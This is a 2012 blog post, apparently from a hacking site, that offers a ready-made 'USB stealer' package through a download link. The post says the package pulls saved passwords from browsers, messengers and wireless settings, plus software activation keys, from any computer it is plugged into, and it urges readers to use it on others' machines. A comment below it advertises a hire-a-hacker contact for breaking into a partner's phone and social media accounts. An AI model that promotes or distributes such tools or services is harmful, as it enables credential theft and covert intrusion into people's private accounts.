Monday, February 27, 2012

USB Stealer Package

I have already post this tutorials on how to make a usb stealer that will take passwords from a computer in a matter of seconds. After reading through the posts, alot of people have trouble putting the files together or finding them on the web.

So I have put together everything you need to make a USB stealer! Everything is ready to go and all you need to do is put it on your flash drive and then goto work on some computers.


Steals passwords from: Firefox, Chrome, IE, Opera, AIM, Yahoo, Gmail, and Dialup/Wireless Network.

Steals keys from: Microsoft Word, Outlook, Powerpoint, etc. Windows keys, and various other programs that involve keys for activation.

Download:

http://www.mediafire.com/?y15jpz6aawf8fso


Thanks to Basava Gowda..

1 comments:

jane holly said...

My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

Post a Comment

 
Design by Secure Hackers